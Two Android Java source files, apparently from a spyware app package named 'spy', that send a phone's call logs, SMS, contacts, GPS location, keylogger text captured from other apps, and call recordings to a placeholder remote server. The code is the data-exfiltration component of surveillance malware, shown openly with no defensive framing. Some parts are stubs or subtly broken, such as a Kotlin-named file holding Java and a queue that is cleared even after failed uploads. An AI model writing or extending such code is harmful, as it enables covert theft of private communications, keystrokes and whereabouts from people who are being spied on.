File: android-client/app/src/java/com/gauravhanna/spy/NetworkHelper.java
package com.gauravhanna.spy;

import android.content.Context;
import android.content.SharedPreferences;
import android.location.Location;
import com.google.gson.Gson;
import okhttp3.*;
import java.io.IOException;
import java.util.List;
import java.util.concurrent.TimeUnit;

public class NetworkHelper {
    private static final String BASE_URL = "http://your-server-ip:5000/api/client";
    private static final OkHttpClient client = new OkHttpClient.Builder()
            .connectTimeout(30, TimeUnit.SECONDS)
            .writeTimeout(30, TimeUnit.SECONDS)
            .readTimeout(30, TimeUnit.SECONDS)
            .build();
    private static Gson gson = new Gson();

    // Device ID stored in SharedPreferences
    private static String getDeviceId(Context context) {
        SharedPreferences prefs = context.getSharedPreferences("spy_prefs", Context.MODE_PRIVATE);
        return prefs.getString("device_id", null);
    }

    private static void setDeviceId(Context context, String id) {
        SharedPreferences prefs = context.getSharedPreferences("spy_prefs", Context.MODE_PRIVATE);
        prefs.edit().putString("device_id", id).apply();
    }

    // Register device (call once)
    public static void registerDevice(Context context, String deviceId, String deviceName, String model, String androidVersion, String userId) {
        RequestBody body = RequestBody.create(MediaType.parse("application/json"),
                "{\"deviceId\":\"" + deviceId + "\",\"deviceName\":\"" + deviceName + "\",\"deviceModel\":\"" + model + "\",\"androidVersion\":\"" + androidVersion + "\",\"userId\":\"" + userId + "\"}");
        Request request = new Request.Builder()
                .url(BASE_URL + "/register")
                .post(body)
                .build();
        client.newCall(request).enqueue(new Callback() {
            @Override
            public void onFailure(Call call, IOException e) { e.printStackTrace(); }
            @Override
            public void onResponse(Call call, Response response) throws IOException {
                if (response.isSuccessful()) {
                    // Parse response to get server device id
                    // For simplicity, we assume deviceId is same
                }
            }
        });
    }

    // Send calls
    public static void sendCalls(Context context, List<DataCollector.CallLogEntry> calls) {
        String deviceId = getDeviceId(context);
        if (deviceId == null) return;
        String json = gson.toJson(calls);
        RequestBody body = RequestBody.create(MediaType.parse("application/json"),
                "{\"deviceId\":\"" + deviceId + "\",\"calls\":" + json + "}");
        Request request = new Request.Builder()
                .url(BASE_URL + "/calls")
                .post(body)
                .build();
        client.newCall(request).enqueue(new Callback() {
            @Override
            public void onFailure(Call call, IOException e) { e.printStackTrace(); }
            @Override
            public void onResponse(Call call, Response response) throws IOException {
                response.close();
            }
        });
    }

    // Send SMS
    public static void sendSMS(Context context, List<DataCollector.SmsEntry> smsList) {
        // similar
    }

    // Send contacts
    public static void sendContacts(Context context, List<DataCollector.ContactEntry> contacts) {
        // similar
    }

    // Send location
    public static void sendLocation(Context context, Location location) {
        String deviceId = getDeviceId(context);
        if (deviceId == null) return;
        String json = "{\"deviceId\":\"" + deviceId + "\",\"lat\":" + location.getLatitude() + ",\"lng\":" + location.getLongitude() + ",\"speed\":" + location.getSpeed() + "}";
        RequestBody body = RequestBody.create(MediaType.parse("application/json"), json);
        Request request = new Request.Builder()
                .url(BASE_URL + "/location")
                .post(body)
                .build();
        client.newCall(request).enqueue(new Callback() {
            @Override
            public void onFailure(Call call, IOException e) { e.printStackTrace(); }
            @Override
            public void onResponse(Call call, Response response) throws IOException {
                response.close();
            }
        });
    }

    // Send keylog
    public static void sendKeylog(Context context, String appPackage, String text) {
        String deviceId = getDeviceId(context);
        if (deviceId == null) return;
        String json = "{\"deviceId\":\"" + deviceId + "\",\"appPackage\":\"" + appPackage + "\",\"text\":\"" + text.replace("\"", "\\\"") + "\"}";
        RequestBody body = RequestBody.create(MediaType.parse("application/json"), json);
        Request request = new Request.Builder()
                .url(BASE_URL + "/keylog")
                .post(body)
                .build();
        client.newCall(request).enqueue(new Callback() {
            @Override
            public void onFailure(Call call, IOException e) { e.printStackTrace(); }
            @Override
            public void onResponse(Call call, Response response) throws IOException {
                response.close();
            }
        });
    }
}

File: android-client/app/src/java/com/gauravhanna/spy/utils/NetworkHelper.kt
package com.gauravhanna.spy.utils;

import android.content.Context;
import android.net.ConnectivityManager;
import android.net.NetworkInfo;
import android.util.Log;

import org.json.JSONObject;

import java.io.IOException;
import java.util.List;
import java.util.concurrent.TimeUnit;

import okhttp3.MediaType;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.RequestBody;
import okhttp3.Response;

public class NetworkHelper {
    private static final String TAG = "NetworkHelper";
    private static final String SERVER_URL = "https://your-server.com/api/upload"; // Change this to your server URL
    private static final MediaType JSON_MEDIA_TYPE = MediaType.parse("application/json; charset=utf-8");
    
    private static OkHttpClient client = new OkHttpClient.Builder()
            .connectTimeout(30, TimeUnit.SECONDS)
            .writeTimeout(30, TimeUnit.SECONDS)
            .readTimeout(30, TimeUnit.SECONDS)
            .build();
    
    /**
     * Check if device is connected to internet
     */
    public static boolean isOnline(Context context) {
        try {
            ConnectivityManager cm = (ConnectivityManager) context.getSystemService(Context.CONNECTIVITY_SERVICE);
            if (cm != null) {
                NetworkInfo netInfo = cm.getActiveNetworkInfo();
                return netInfo != null && netInfo.isConnectedOrConnecting();
            }
            return false;
        } catch (Exception e) {
            Log.e(TAG, "Error checking network status: " + e.getMessage());
            return false;
        }
    }
    
    /**
     * Trigger sync of pending data
     */
    public static void triggerSync(Context context) {
        if (isOnline(context)) {
            Log.d(TAG, "Network available, uploading pending data...");
            uploadPending(context);
        } else {
            Log.d(TAG, "No network connection, data will be uploaded later");
        }
    }
    
    /**
     * Upload all pending data to server
     */
    private static void uploadPending(Context context) {
        try {
            List<JSONObject> pending = OfflineQueue.getAllPending(context);
            if (pending.isEmpty()) {
                Log.d(TAG, "No pending data to upload");
                return;
            }
            
            Log.d(TAG, "Uploading " + pending.size() + " pending items");
            
            for (JSONObject obj : pending) {
                String type = obj.optString("type");
                try {
                    if (type.equals("call")) {
                        sendCall(context, obj);
                    } else if (type.equals("message")) {
                        sendMessage(context, obj);
                    } else if (type.equals("recording")) {
                        sendRecording(context, obj);
                    }
                } catch (Exception e) {
                    Log.e(TAG, "Error uploading " + type + ": " + e.getMessage());
                    // Don't clear failed items - they'll be retried later
                }
            }
            
            // Clear queue after successful upload
            OfflineQueue.clearQueue(context);
            Log.d(TAG, "All pending data uploaded successfully");
            
        } catch (Exception e) {
            Log.e(TAG, "Error during upload: " + e.getMessage());
        }
    }
    
    /**
     * Send call log to server
     */
    private static void sendCall(Context context, JSONObject callData) {
        try {
            Log.d(TAG, "Sending call data: " + callData.toString());
            
            RequestBody body = RequestBody.create(callData.toString(), JSON_MEDIA_TYPE);
            Request request = new Request.Builder()
                    .url(SERVER_URL + "/calls")
                    .post(body)
                    .addHeader("Content-Type", "application/json")
                    .build();
            
            try (Response response = client.newCall(request).execute()) {
                if (response.isSuccessful()) {
                    Log.d(TAG, "Call data uploaded successfully");
                } else {
                    Log.e(TAG, "Failed to upload call data: " + response.code());
                    throw new IOException("Server returned error: " + response.code());
                }
            }
        } catch (Exception e) {
            Log.e(TAG, "Error sending call: " + e.getMessage());
            throw new RuntimeException(e);
        }
    }
    
    /**
     * Send message to server
     */
    private static void sendMessage(Context context, JSONObject messageData) {
        try {
            Log.d(TAG, "Sending message data: " + messageData.toString());
            
            RequestBody body = RequestBody.create(messageData.toString(), JSON_MEDIA_TYPE);
            Request request = new Request.Builder()
                    .url(SERVER_URL + "/messages")
                    .post(body)
                    .addHeader("Content-Type", "application/json")
                    .build();
            
            try (Response response = client.newCall(request).execute()) {
                if (response.isSuccessful()) {
                    Log.d(TAG, "Message data uploaded successfully");
                } else {
                    Log.e(TAG, "Failed to upload message data: " + response.code());
                    throw new IOException("Server returned error: " + response.code());
                }
            }
        } catch (Exception e) {
            Log.e(TAG, "Error sending message: " + e.getMessage());
            throw new RuntimeException(e);
        }
    }
    
    /**
     * Send recording to server (with file upload)
     */
    private static void sendRecording(Context context, JSONObject recordingData) {
        try {
            String filePath = recordingData.optString("filePath");
            Log.d(TAG, "Sending recording from: " + filePath);
            
            // For recording, you might need to upload the actual file
            // This is a placeholder - implement actual file upload as needed
            
            // Option 1: Send as JSON with file path
            RequestBody body = RequestBody.create(recordingData.toString(), JSON_MEDIA_TYPE);
            Request request = new Request.Builder()
                    .url(SERVER_URL + "/recordings")
                    .post(body)
                    .addHeader("Content-Type", "application/json")
                    .build();
            
            try (Response response = client.newCall(request).execute()) {
                if (response.isSuccessful()) {
                    Log.d(TAG, "Recording data uploaded successfully");
                } else {
                    Log.e(TAG, "Failed to upload recording: " + response.code());
                    throw new IOException("Server returned error: " + response.code());
                }
            }
            
            // Option 2: If you need to upload actual audio file
            // You would need to use MultipartBody here
            
        } catch (Exception e) {
            Log.e(TAG, "Error sending recording: " + e.getMessage());
            throw new RuntimeException(e);
        }
    }
    
    /**
     * Set custom server URL if needed
     */
    public static void setServerUrl(String url) {
        // SERVER_URL = url; // You'd need to change the variable to non-final
        // Or better, store it in SharedPreferences
    }
}